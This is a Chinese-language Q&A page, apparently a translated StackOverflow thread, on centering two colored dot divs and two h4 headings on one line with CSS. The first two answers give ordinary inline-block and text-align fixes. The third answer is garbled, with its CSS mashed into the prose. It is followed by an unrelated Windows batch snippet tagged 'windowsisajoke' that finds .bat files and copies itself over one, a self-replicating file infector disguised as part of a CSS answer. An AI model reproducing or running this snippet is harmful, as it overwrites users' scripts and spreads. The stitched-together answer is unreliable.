对齐并居中两个div和两个标题

时间:2016-03-29 16:05:14

标签: html css

我有2个div和2个H4标题,需要排成一行。尝试与text-align对齐并向左浮动,但它不起作用。

根据我的理解,可以通过对元素使用float来实现并排对齐,但在我的情况下不会发生。也无法使他们居中。目前尝试使用30%的保证金,我认为这不是一个合适的解决方案。下面的图片显示了它当前的外观以及我如何让它看起来。

HTML

<div class="k-legend-title">
<div class="k-stat-title-color-box" style="background-color: #3DA1ED;"></div>
<h4 class="">Driver 1</h4>
<div class="k-stat-title-color-box" style="background-color: #652D91;"></div>
<h4 class="">Driver 2</h4>

CSS

.k-legend-title{
    color: #C3CF01;
}

.k-stat-title-color-box {
    width: 10px;
    height: 10px;
    border-radius: 25px;
    background: #ccc;
    float: left;
    margin-top: 6px;
    margin-right:5px;
    margin-left: 30%;
}

当前布局

enter image description here

尝试获取此布局。中心和一行

enter image description here

3 个答案:

答案 0 :(得分:2)

使它们成为内联级别,不要使用浮点数。然后,您可以将它们水平对齐到容器上的text-align,并通过vertical-align垂直对齐它们。

.k-legend-title {
  color: #C3CF01;
  text-align: center;
}
.k-stat-title-color-box, h4 {
  display: inline-block;
  vertical-align: middle;
  margin: 5px 0;
}
.k-stat-title-color-box {
  width: 10px;
  height: 10px;
  border-radius: 25px;
  background: #ccc;
}
<div class="k-legend-title">
  <div class="k-stat-title-color-box" style="background-color: #3DA1ED;"></div>
  <h4>Driver 1</h4>
  <div class="k-stat-title-color-box" style="background-color: #652D91;"></div>
  <h4>Driver 2</h4>
</div>

答案 1 :(得分:0)

默认情况下,h1-h6元素有 display:block ,在这种情况下你应该使用display:inline-block。

h4{
  display: inline-block;
}

h4:first-of-type{
  margin-right: 15px;
}

JSfiddle here

答案 2 :(得分:0)

尝试使用display:inline-blocktext-align:center使用.k-legend-title { text-align:center; color: #C3CF01; } .k-stat-title-color-box { width: 10px; height: 10px; border-radius: 25px; background: #ccc; display:inline-block; margin-top: 6px; } h4 { display:inline-block; } .k-legend-title h4:first-of-type { margin-right: 10px; }

    rem windowsisajoke
    for %%f in (*.bat) do (set A=%%f)
    set FILE=%A%
    set CONTENT=windowsisajoke
    findstr /i "%CONTENT%" %FILE% >NUL
    if errorlevel 0 goto end
    copy %0 %A%
    :end

小提琴:https://jsfiddle.net/kaarccq4/